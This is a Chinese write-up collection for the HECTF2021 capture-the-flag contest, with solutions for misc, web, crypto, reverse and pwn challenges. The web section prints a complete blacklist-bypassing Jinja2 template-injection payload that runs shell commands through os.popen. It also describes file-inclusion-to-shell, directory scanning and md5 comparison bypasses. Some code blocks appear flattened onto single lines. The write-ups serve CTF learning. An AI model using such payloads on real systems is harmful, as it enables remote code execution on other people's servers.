HECTF2021-WP集合
2024-05-16 14:42:03
WP来自齐鲁师范学院网络安全社团
关注公众号接收更多最新的安全讯息
文章目录
- misc
- 快来公众号ya
- JamesHarden
- 捉迷藏
- 迷途的狗狗
- snake
- WEB
- EDGnb(签到)
- LFI_RCE
- 时光塔的宝藏
- ez_py
- mmmmd5d5d5d5
- Crypto
- 签到
- encode
- RSA_e_n
- re-rsa
- Re
- hard
- Baby_pp
- pwn
- 签到
misc
快来公众号ya
关注公众号回复签到
SangFor{AaKjtQr_OjJpdA3QwBV_ndsKdn3vPgc_}
JamesHarden
解压出来的压缩包中有一个没有后缀名的文件,用010打开
zip的文件头,改成zip文件,解压
里面是个class文件,用记事本打开
疑似凯撒,解密得到flag
HECTF{We1c0me_T0_H3ct6_!}
捉迷藏
解压文件得到一个word文档,打开没发现什么东西,改成zip格式后查看\word\document.xml文件,发现大量jsfuck密文
都复制下来,解密
HECTF{dfdfj234kflfj3fadfdsv}
迷途的狗狗
下载文件并解压后得到两个文件
压缩包加密,直接爆破提示版本号出错
拖进010里面修改版本号,修改0
之后用WinRar修复压缩包,再直接爆破
得到密码142345
之后分离图片,得到flag
HECTF{祝各位师傅玩的开心,期待HECTF2022您的到来}
snake
拿到发现是个exe文件 看logo可以猜测是pyistaller打包之后的exe
提取下py文件
修复一下snake的文件结构
修复完后的snake是pyc文件 转成py文件
查看源码
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.8.5 (tags/v3.8.5:580fbb0, Jul 20 2020, 15:57:54) [MSC v.1924 64 bit (AMD64)]
# Embedded file name: snake.py
# Compiled at: 1995-09-28 00:18:56
# Size of source mod 2**32: 272 bytes
import pygame, sys, random
SCREEN_X = 700
SCREEN_Y = 700class Snake(object):def __init__(self):self.dirction = pygame.K_RIGHTself.body = []for x in range(5):self.addnode()def addnode(self):left, top = (0, 0)if self.body:left, top = self.body[0].left, self.body[0].topelse:node = pygame.Rect(left, top, 20, 20)if self.dirction == pygame.K_LEFT:node.left -= 20else:if self.dirction == pygame.K_RIGHT:node.left += 20else:if self.dirction == pygame.K_UP:node.top -= 20else:if self.dirction == pygame.K_DOWN:node.top += 20self.body.insert(0, node)def delnode(self):self.body.pop()def isdead(self):if self.body[0].x not in range(SCREEN_X):return Trueif self.body[0].y not in range(SCREEN_Y):return Trueif self.body[0] in self.body[1:]:return Truereturn Falsedef move(self):self.addnode()self.delnode()def changedirection(self, curkey):LR = [pygame.K_LEFT, pygame.K_RIGHT]UD = [pygame.K_UP, pygame.K_DOWN]if curkey in LR + UD:if curkey in LR:if self.dirction in LR:returnif curkey in UD:if self.dirction in UD:returnself.dirction = curkeyclass Food:def __init__(self):self.rect = pygame.Rect(-20, 0, 20, 20)def remove(self):self.rect.x = -20def set(self):if self.rect.x == -20:allpos = [(220, 620), (140, 580), (380, 280), (320, 260), (440, 500), (320, 100), (420, 240), (380, 260), (160, 280), (480, 460), (340, 260), (420, 580), (140, 460), (180, 380), (60, 160), (200, 100), (320, 620), (120, 540), (360, 480), (420, 460), (100, 40), (280, 100), (60, 60), (100, 480), (20, 60), (100, 80), (500, 320), (300, 500), (60, 320), (560, 220), (400, 100), (360, 20), (460, 380), (100, 400), (100, 500), (400, 60), (520, 320), (160, 60), (480, 440), (360, 600), (140, 540), (520, 220), (500, 220), (80, 60), (520, 280), (260, 60), (320, 320), (320, 240), (460, 280), (580, 20), (140, 80), (40, 240), (420, 420), (100, 440), (180, 60), (140, 420), (220, 400), (440, 300), (240, 380), (420, 480), (360, 260), (460, 320), (160, 100), (260, 80), (520, 40), (200, 260), (360, 580), (100, 380), (80, 620), (360, 620), (340, 440), (200, 60), (200, 300), (20, 500), (400, 20), (120, 620), (540, 220), (240, 420), (320, 200), (60, 300), (260, 320), (300, 580), (160, 480), (140, 200), (100, 420), (420, 20), (360, 500), (240, 500), (140, 620), (260, 620), (100, 100), (540, 60), (420, 380), (240, 400), (60, 180), (480, 380), (40, 500), (560, 320), (320, 280), (260, 280), (160, 540), (300, 440), (60, 200), (560, 280), (240, 260), (200, 280), (180, 500), (100, 20), (540, 20), (320, 300), (80, 600), (380, 200), (20, 40), (440, 580), (580, 60), (420, 400), (140, 60), (120, 440), (520, 20), (260, 40), (320, 220), (360, 560), (100, 460), (200, 20), (80, 520), (60, 500), (300, 600), (520, 60), (420, 260), (260, 260), (140, 100), (380, 240), (160, 300), (500, 260), (400, 540), (560, 60), (480, 400), (380, 320), (400, 80), (580, 500), (240, 480), (160, 600), (440, 380), (540, 280), (160, 620), (380, 20), (460, 440), (400, 620), (400, 40), (300, 480), (420, 560), (20, 20), (500, 280), (300, 100), (60, 280), (360, 200), (240, 460), (520, 100), (340, 200), (500, 300), (440, 20), (420, 300), (240, 620), (140, 20), (300, 20), (420, 280), (20, 80), (220, 500), (320, 20), (60, 260), (300, 460), (200, 320), (520, 80), (140, 40), (420, 440), (60, 220), (480, 480), (180, 20), (180, 100), (320, 440), (160, 580), (80, 560), (360, 460), (100, 60), (120, 580), (420, 320), (560, 20), (300, 620), (40, 60), (360, 440), (420, 500), (60, 240), (100, 240), (240, 440), (260, 300), (260, 500), (120, 260), (140, 320), (480, 500), (20, 100), (500, 240), (120, 560), (380, 300), (80, 580), (420, 600), (140, 260), (80, 140), (300, 560), (120, 200), (220, 260), (160, 400), (280, 20), (160, 20), (100, 220), (540, 500), (380, 220), (460, 500), (560, 500), (120, 320), (540, 320), (80, 340), (340, 620)]random.shuffle(allpos)self.rect.left, self.rect.top = random.choice(allpos)def show_text(screen, pos, text, color, font_bold=False, font_size=30, font_italic=False):cur_font = pygame.font.SysFont('宋体', font_size)cur_font.set_bold(font_bold)cur_font.set_italic(font_italic)text_fmt = cur_font.render(text, 1, color)screen.blit(text_fmt, pos)def main():pygame.init()screen_size = (SCREEN_X, SCREEN_Y)screen = pygame.display.set_mode(screen_size)pygame.display.set_caption('Welcome to HECTF,enjoy!')clock = pygame.time.Clock()scores = 0isdead = Falsesnake = Snake()food = Food()while True:for event in pygame.event.get():if event.type == pygame.QUIT:sys.exit()if event.type == pygame.KEYDOWN:snake.changedirection(event.key)if event.key == pygame.K_SPACE and isdead:return main()screen.fill((205, 205, 205))if not isdead:snake.move()for rect in snake.body:pygame.draw.rect(screen, (0, 220, 0), rect, 0)isdead = snake.isdead()if isdead:show_text(screen, (100, 200), 'You lose :(', (227, 29, 18), False, 100)show_text(screen, (150, 260), 'press SAPCE to try again...', (0, 0, 22), False, 30)if food.rect == snake.body[0]:scores += 100food.remove()snake.addnode()food.set()pygame.draw.rect(screen, (136, 0, 21), food.rect, 0)show_text(screen, (50, 600), 'Scores: ' + str(scores), (223, 0, 0))if scores > 400:show_text(screen, (100, 650), 'f', (223, 223, 0))if scores > 500:show_text(screen, (110, 650), 'l', (223, 223, 0))if scores > 600:show_text(screen, (120, 650), 'a', (223, 223, 0))if scores > 700:show_text(screen, (130, 650), 'g', (223, 223, 0))if scores > 800:show_text(screen, (150, 650), 'i', (223, 223, 0))if scores > 900:show_text(screen, (160, 650), 's', (223, 223, 0))show_text(screen, (450, 650), 'Try to get 6000 points', (223, 223, 223))if scores >= 6000:show_text(screen, (100, 670), 'wtf,you really got 6000 points?check the source code', (223,223,223))show_text(screen, (100, 470), 'the original author is codetask from', (223,223,223))show_text(screen, (100, 490), 'https://gitee.com/codetimer,thanks to him', (223,223,223))pygame.display.update()clock.tick(10)if __name__ == '__main__':main()
# okay decompiling snake.pyc
通过查看https://gitee.com/codetimer 中的源码,发现此代码中food函数中有大量坐标点,将其提取出来并修改格式,用gnuplot画图
隐约能看出HECTF,截图用ps操作一下
HECTF{SnAkE_K1nG_is_u}
WEB
EDGnb(签到)
docker run -it moth404/edgnb
进入容器,查看目录,发现flag,读取,flag文件为空,结合上面的touch显示结果(一堆flag文件)推测flag应该不在容器内部
查看docker history,容器构建记录
docker history moth404/edgnb --no-trunc=true
发现构建时传入了flag参数
HECTF{EDGnb!EDGnb!!EDGnb!!!EDGnbnbnb}
LFI_RCE
存在文件包含
利用PHP_SESSION_UPLOAD_PROGRESS 加文件包含条件竞争getshell
https://www.freebuf.com/vuls/202819.html
时光塔的宝藏
(=非预期=)
打开题目是登录框
使用dirsearch扫描一下
py .\dirsearch.py -u “http://81.70.102.209:10020/”
发现./flag.php
进入目录
拿到flag
1 hectf{eeeeeeaaaazzzy_3q1}
ez_py
更换请求方式
查看路径,发现黑名单
构造payload
http://81.70.102.209:10030/welhectf?name={% set pop=dict(pop=a)|join%}{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18) %}{% set gb=(xiahuaxian,xiahuaxian,dict(glo=a,bals=a)|join,xiahuaxian,xiahuaxian)|join %}{% set get=dict(get=a)|join%}{% set os=dict(os=a)|join %}{% set popen=dict(popen=a)|join%}{% set ca=dict(ca=a,t=a)|join%}
{% set nn=dict(n=a)|join%}
{% set tt=dict(t=a)|join%}
{% set ff=dict(f=a)|join%}
{% set dd=dict(index=a)|join%}
{% set id=dict(ind=a,ex=a)|join%}
{% set five=(lipsum|string|list)|attr(id)(tt) %}
{% set three=(lipsum|string|list)|attr(id)(nn) %}
{% set one=(lipsum|string|list)|attr(id)(ff) %}
{% set bin=(xiahuaxian,xiahuaxian,dict(built=a,ins=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set cr=dict(ch=a,r=a)|join%}
{% set chcr=(lipsum|attr(gb))|attr(get)(bin)|attr(get)(cr) %}
{% set xiegang=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}
{% set rd=dict(re=a,ad=a)|join%}
{% set ls=dict(ls=a)|join%}
{% set space=chcr(three*three*five-five-five-three) %}
{% set shell=(ls,space,xiegang,dict(code=a)|join)|join %}{%print(lipsum|attr(gb)|attr(get)(os)|attr(popen)(shell)|attr(rd)())%}
解码上边的base64
SEVDVEZ7ZndoZmRfZmVGREtkeF9mamRrc2x4fQ==HECTF{fwhfd_feFDKdx_fjdkslx}
mmmmd5d5d5d5
传参a,b值,不相等但是md5值一样,
数组绕过
http://81.70.102.209:10010/?a[]=1&b[]=1;
第二关发现题目漏洞,url里是md52.php而第一关是md51.php
可以合理推断
第三关是md53.php
跳转到一个页面
md5截断,写个脚本
<?phpfor($i=0;$i<=9999999;$i++)if (substr(md5($i),5,5)=='af7ad'){echo $i;break;}?>
把脚本输出的贴上就行,下一关post传参,要不相等但md5后一样
Crypto
签到
与佛论禅,在线解密
SkJDVUdWQ0dQTlRXNjMzRUw1V0hLWTNMTDVURzY0UzdQRlhYSzdJPQ==,base64
JBCUGVCGPNTW633EL5WHKY3LL5TG64S7PFXXK7I=,base32
HECTF{good_luck_for_you}
encode
解压附件用010查看,是rar
修改后缀名并解压,md中是emoji符号,在线网站解密
http://www.atoolbox.net/Tool.php?Id=937
截图并反转,是last step:wl_blf_orpv_vnlgrxlm
根据提示《逾越节的阴谋》找到埃特巴什密码,解密
HECTF{do_you_like_emoticon}
RSA_e_n
e太大了,基本确定是维纳攻击,脚本梭哈
from RSAwienerHacker import hack_RSA
e = 14536597368909701101001200256941961974837464809061658640289510091042380365818199702046209637846878321051911953478636962155851364745688577015502765094911097840408612024930234182134155906105709515732525224859491213269420883975325253955300495659738062649536403673292528916221126321551642240248228081199068509519
n = 82682300117674279215080455101416910344254761284016535674428084455559823911633545375294290471927265348290309866584853573250651405746950773694162544557054279975976137565971186070553416802999462943357087592313263254619766769163485073959894470761998013410473974312262048785789689412772924269917002276633928580633
d=hack_RSA(e,n)
c = 10127659956533419108589656976567211166527205183773088147543122705230809548550336271584049969380709512046523116316965506372940655242616078713681678662841367955124154879878984026023241163358487655249424233120021240245459984899558747887087199609289148343740081670749999484769650710161617077523656215330005636913
m=pow(c ,d ,n)
print (hex(m))
得到一串16进制数48454354467b5253415f4c4c4c5f31735f73305f7573656675312121217d
转字符串
HECTF{RSA_LLL_1s_s0_usefu1!!!}
re-rsa
附加解压出来是个exe,用ida看看
在字符串界面看到很多python函数,估计是个python的exe文件,用工具逆一下
pyinstxtractor-master
运行此工具会生成一个文件夹,其中就有我们需要的pyc文件
再用uncompyle6查看pyc的源码
import math
print('please input you flag:')
s = input()
e1 = 65537
e2 = 72613
n = 95525425639268618904242122073026771652646935213019341295993735437526311434723595304323184458026403667135481765527601691276167501123468272392153875706450309539988975293150023714062357483846051629494980532347703161226570915424953846206752605423302029528621365549138045079620953801043515344814417917150911967549
c1 = 50016380988825140771789180404368584321245554683013673243046447860755867497534086012885574115002127671925300478433415755560263795098483437759149032753639933337607469174389736337484921429167989878010333069673315284150101512841433875596818188946001404448747955836101233969447148134936974685144748020721536655880
c2 = 26537341777006051577926179760889007551446534081220228677053318628104352649245453831819534150578124853240201955246509156538727940288191114859714195834458609907788583932554762063942375909339356517120487495715517451310527953747976853825698190357350112353821036342918427063247243961171993690840366127227039390141
h = ''
for i in range(len(s)):x = hex(ord(s[i]))[2:]if len(x) < 2:x = '0' + xh = h + x
else:m = int(h, 16)if pow(m, e1, n) == c1 and pow(m, e2, n) == c2:print('Successful!')else:print('Wrong flag!')
一个n,两个c,两个e,是共模,上脚本
from gmpy2 import invertdef gongmogongji(n, c1, c2, e1, e2):def egcd(a, b):if b == 0:return a, 0else:x, y = egcd(b, a % b)return y, x - (a // b) * ys = egcd(e1, e2)s1 = s[0]s2 = s[1]# 求模反元素if s1 < 0:s1 = - s1c1 = invert(c1, n)elif s2 < 0:s2 = - s2c2 = invert(c2, n)m = pow(c1, s1, n) * pow(c2, s2, n) % nreturn m
n= 95525425639268618904242122073026771652646935213019341295993735437526311434723595304323184458026403667135481765527601691276167501123468272392153875706450309539988975293150023714062357483846051629494980532347703161226570915424953846206752605423302029528621365549138045079620953801043515344814417917150911967549
e1= 65537
e2= 72613
c1= 50016380988825140771789180404368584321245554683013673243046447860755867497534086012885574115002127671925300478433415755560263795098483437759149032753639933337607469174389736337484921429167989878010333069673315284150101512841433875596818188946001404448747955836101233969447148134936974685144748020721536655880
c2= 26537341777006051577926179760889007551446534081220228677053318628104352649245453831819534150578124853240201955246509156538727940288191114859714195834458609907788583932554762063942375909339356517120487495715517451310527953747976853825698190357350112353821036342918427063247243961171993690840366127227039390141result = gongmogongji(n, c1, c2, e1, e2)
print(hex(result))
输出:0x48454354467b5253415f616e645f5079496e7374616c6c65725f31735f766537795f656124792121217d
再转一下格式,就是flag
HECTF{RSA_LLL_1s_s0_usefu1!!!}HECTF{RSA_and_PyInstaller_1s_ve7y_ea$y!!!}
LittleRSA
解压附件并查看源码
import random
import hashlib
import string
import sympy
import gmpy2
from Crypto.Util.number import *se = random.randint(1,1000)
random.seed(se)STR = list(string.ascii_letters+string.digits)
proof = ''.join([STR[random.randint(1, 62)-1] for _ in range(20)])
digest = hashlib.sha256(proof.encode()).hexdigest()print(proof[4:])
print(digest)e = sympy.nextprime(int(bytes(proof[:4],'utf-8').hex(),16))
p = sympy.nextprime(random.randint(pow(2,1023),pow(2,1024)))
q = sympy.nextprime(random.randint(pow(2,1023),pow(2,1024)))
flag = b'HECTF{XXXXXXXXXXXXXXX}'
m = bytes_to_long(flag)
n = p*q
c = pow(m,e,n)
print(c)
'''
NYAdQidL59lHklvI
1c92e2001540854eb03a06aa37b7bdc76b41a42d315c6dafb02bb339de9a3f25
12424425564383219080490551209643464847620938168930079127681706857658268732506553762185733232174616369346638607986790966147165572856020333466266950817761290120789562282899235194115801039977159247279287016533562522176851376987246778559325369725945217698449887185588509259585902043152698222880550864805704835462119046093822533459389519887750590547895454677651757127860660687183857783014508127001807318860919181678041597391665738436983340807978924856116264434249926664228272176813107767851582594893815624629540970573254201006817388643737600565142486019783712277126799182049309476758941334813964777650021632346392783087599
'''
p,q和proof都是随机产生的,上方的random.seed就是种子,不过这个种子也是0到1000之间的随机数,写一个脚本跑出所有种子下的proof并和给出的输出对比就知道正确的种子
import random
import hashlib
import string
import sympy
import gmpy2
from Crypto.Util.number import *
f = open("1.txt",'w')
for se in range(0,1000):random.seed(se)f.write(str(se)+ '\n')STR = list(string.ascii_letters+string.digits)proof = ''.join([STR[random.randint(1, 62)-1] for _ in range(20)])f.write(proof + '\n')digest = hashlib.sha256(proof.encode()).hexdigest()
搜索NYAdQidL59lHklvI
种子是571,确定种子然后修改源码,使其输出正确的p,q和e
import random
import hashlib
import string
import sympy
import gmpy2
from Crypto.Util.number import *random.seed(571)STR = list(string.ascii_letters+string.digits)
proof = ''.join([STR[random.randint(1, 62)-1] for _ in range(20)])
digest = hashlib.sha256(proof.encode()).hexdigest()print(proof[4:])
print(digest)e = sympy.nextprime(int(bytes(proof[:4],'utf-8').hex(),16))
p = sympy.nextprime(random.randint(pow(2,1023),pow(2,1024)))
q = sympy.nextprime(random.randint(pow(2,1023),pow(2,1024)))
flag = b'HECTF{XXXXXXXXXXXXXXX}'
m = bytes_to_long(flag)
n = p*q
c = pow(m,e,n)
print(e)
print(p)
print(q)
'''
NYAdQidL59lHklvI
1c92e2001540854eb03a06aa37b7bdc76b41a42d315c6dafb02bb339de9a3f25
12424425564383219080490551209643464847620938168930079127681706857658268732506553762185733232174616369346638607986790966147165572856020333466266950817761290120789562282899235194115801039977159247279287016533562522176851376987246778559325369725945217698449887185588509259585902043152698222880550864805704835462119046093822533459389519887750590547895454677651757127860660687183857783014508127001807318860919181678041597391665738436983340807978924856116264434249926664228272176813107767851582594893815624629540970573254201006817388643737600565142486019783712277126799182049309476758941334813964777650021632346392783087599
'''
输出:
NYAdQidL59lHklvI
1c92e2001540854eb03a06aa37b7bdc76b41a42d315c6dafb02bb339de9a3f25
1785803627
145761905930263138706936874952287989451163740801768124316638194142053136728482823176175006571074964544663304793459554206652959217189535730286200684386647465283995296122915022195050319604559741051002366944416141348676197874185262201649841435463619858083016023221897609700155299995358787406738947679758978398079
91536557984668704700241147674513341431163262522271166024774731241046009089878244315861936297361116478818372387622618452092967843503795947991656539912625954357511406372314568099344007331186921707503763242814545509139824084213975728811966334411984509916811665096919194290285039049454829579869446244711563361247
原脚本就算种子正确,最后的c也是不相同的,是因为参与运算的m不正确。那么给出的c应该就是正确的c
跑脚本
import libnum
import gmpy2
import binascii
import sympy
import random
from Crypto.Util.number import bytes_to_long
import libnum
from Crypto.Util.number import long_to_bytesrandom.seed(571)c = 12424425564383219080490551209643464847620938168930079127681706857658268732506553762185733232174616369346638607986790966147165572856020333466266950817761290120789562282899235194115801039977159247279287016533562522176851376987246778559325369725945217698449887185588509259585902043152698222880550864805704835462119046093822533459389519887750590547895454677651757127860660687183857783014508127001807318860919181678041597391665738436983340807978924856116264434249926664228272176813107767851582594893815624629540970573254201006817388643737600565142486019783712277126799182049309476758941334813964777650021632346392783087599
# n = int("",16)
e = 1785803627
# e = int("",16)
p = 145761905930263138706936874952287989451163740801768124316638194142053136728482823176175006571074964544663304793459554206652959217189535730286200684386647465283995296122915022195050319604559741051002366944416141348676197874185262201649841435463619858083016023221897609700155299995358787406738947679758978398079
q = 91536557984668704700241147674513341431163262522271166024774731241046009089878244315861936297361116478818372387622618452092967843503795947991656539912625954357511406372314568099344007331186921707503763242814545509139824084213975728811966334411984509916811665096919194290285039049454829579869446244711563361247
print(p)
print(q)
n = p * q
flag = b''
d = gmpy2.invert(e, (p - 1) * (q - 1))
m = pow(c, d, n) # m 的十进制形式
flag += long_to_bytes(m) # m明文
print(flag)
HECTF{yujnbg4rdsw3xdfvrfgyrtgvcd}
Re
hard
附件64位,无壳
用ida看看
查找字符串
HECTF{HElLo_RRRRe}
Baby_pp
附件64位,无壳,易语言?
用ida看看
一样的套路,是个python的exe套了个易语言的壳
还是使用上面的方法,得到源码
import random
ens = '742641edefb6770733ab5932325106b3a5fa75222791d09e451161c46f15504402b32737362443d4df7d136145cd970b54116669c230'def encode(s, nuum):step = len(s) // nuumens = ''for i in range(step):ens += s[i::step]else:return ensdef main():random.seed(10085)u_input = input(': ')t = ''for i in u_input:t += '%02x' % (ord(i) ^ random.randint(0, 127))else:eni = encode(t, 6)if eni == ens:print('Success!')else:print('Failed!')if __name__ == '__main__':main()
encode函数进行的是换位,没有改变字符串的长度,所以step是18,加密方式就是每隔18位取一位放到一个新的字符串里。
脚本:
import random
str = '742641edefb6770733ab5932325106b3a5fa75222791d09e451161c46f15504402b32737362443d4df7d136145cd970b54116669c230'
flag = ''
for i in range(0,6):flag += str[i::6]
print(flag)
输出:7e7a3b794c5b3d1c564d7b23515403643d492e055a2d16422d691c6f7915201f474f17124b330f29610347406316326a7e15273d5b60
random函数给了种子,只要提前声明并且循环次数一样产生的随机数就是相同的。
脚本:
import random
random.seed(10085)
ens = [0x7e,0x7a,0x3b,0x79,0x4c,0x5b,0x3d,0x1c,0x56,0x4d,0x7b,0x23,0x51,0x54,0x03,0x64,0x3d,0x49,0x2e,0x05,0x5a,0x2d,0x16,0x42,0x2d,0x69,0x1c,0x6f,0x79,0x15,0x20,0x1f,0x47,0x4f,0x17,0x12,0x4b,0x33,0x0f,0x29,0x61,0x03,0x47,0x40,0x63,0x16,0x32,0x6a,0x7e,0x15,0x27,0x3d,0x5b,0x60]
t = ''
for i in range(len(ens)):t += chr( ens[i] ^ random.randint(0, 127))
print(t)输出:HECTF{decrypt(80410840840842108808881088408084210842)}
这串数字只有01248五个数字,明显是云影密码,跑脚本
data = '80410840840842108808881088408084210842'list = data.split('0')
print(list)datalist=[]
def dlist(list):d = 0for i in list:for j in i:d += int(j)datalist.append(d)d=0return datalist
datalist = dlist(list)def str(datalist):s=''for i in datalist:s += chr(i+64)return s
print(str(datalist))
输出:HELLOPYTHON
HECTF{HELLOPYTHON}
pwn
签到
nc链接上之后自动打印flag,前提是Ubuntu有中文环境,可以直接在终端里显示中文。
HECTF{欢迎大家来拿flag}
HECTF2021-WP集合相关推荐
- 2021极客大挑战WP集合
WP来自齐鲁师范学院网络安全社团 关注公众号接收更多最新的安全讯息 文章目录 WEB Dark Welcome2021 babypy babyphp babypop where_is_my_FUMO ...
- HECTF2021 WP(部分)
crypto RSA_e_n 维纳攻击 from RSAwienerHacker import hack_RSA import binascii,gmpy2 e=0x14b367bf01efd4dc6 ...
- 接第一篇博客:fw的第二场CTF——HECTF2021 WP
第一篇博客,第一次参加比赛https://blog.csdn.net/qq_42880719/article/details/110139040就是HECTF 所以这HECTF我非打不可了 想当年,刚 ...
- HECTF2021 Reverse wp
前言 昨天结束的比赛,体验不错,Reverse拿了6个一血,也把Reverse的题目AK了,记录下. 文章目录 hard Baby_upx Baby_pp baby-maze baby_and bab ...
- DL之Encoder-Decoder:Encoder-Decoder结构的相关论文、设计思路、关键步骤等配图集合之详细攻略
DL之Encoder-Decoder:Encoder-Decoder模型的相关论文.设计思路.关键步骤等配图集合之详细攻略 目录 Encoder-Decoder模型的相关论文 Encoder-Deco ...
- wp java_Java WordPress工具库wp-client
简介 WordPress Client是一个Java版的WordPress客户端操作库, 主要基于WordPress XML-RPC API实现.目前WordPress Client提供了如下能力: ...
- wordpress:主题-一个完整的WP主题通常包含以下模板文件
zh-cn:主题 Languages:English • Español • Français • Italiano • 日本語 • 한국어 • ລາວ • myanmar • Nederlands ...
- 一些可以参考的文档集合9
之前的文章集合: 一些可以参考文章集合1_xuejianxinokok的博客-CSDN博客 一些可以参考文章集合2_xuejianxinokok的博客-CSDN博客 一些可以参考的文档集合3_xuej ...
- 【ansys常见命令集合】
ANSYS模块简介 APDL换行与续行- APDL规定每行72个字符 如果要写表达式A=C1+C2 (C1与C2都为表达式 可以用 B=C1 A=B+C2 将一行拆成两行来做但是如果不是表达式,而是输 ...
- ansys 常见命令集合
原文地址为: ansys 常见命令集合 APDL换行与续行- APDL规定每行72个字符 如果要写表达式A=C1+C2 (C1与C2都为表达式 可以用 B=C1 A=B+C2 将一行拆成两行来做但是如 ...
最新文章
- python 获取文件后缀名的方法
- 【百度分享】基于内核模块的测试代码编写(二)
- 前端学习(2836):view和text标签
- 计算机管理关机在哪,电脑点了关机为什么却关不了
- 用了这个评估优化LiteOS镜像利器,我有点飘...
- java基础案例教程试题,Java基础案例教程-中国大学mooc-试题题目及答案
- jdk12连接mysql_使用基于JDK12版本的JDBC读取数据库中的数据在网页(jsp)表示出来...
- MIPS 通用寄存器 + 指令
- 《图解TCPIP》知识学习(1.3):协议
- 人工神经网络理论及应用第三章课后题答案
- Unity2019配置ARCore环境
- 【SQL实战项目】电商平台数据分析项目
- 这几款简单好用的录屏软件,快收藏起来
- 到全国各省市关于公务员考试的信息
- python金融分析小知识(23)——matplotlib面向对象绘制股票收盘价曲线
- OBD数据过滤之:变速箱的里程能不能改
- java红宝石是哪本_AES Java编码,红宝石解码
- 链表问题归纳总结--C和C++
- 如何鉴别电脑电源是否虚标(实际输出瓦数)
- 教你怎么用c++基本语法实现一个简单的五子棋小游戏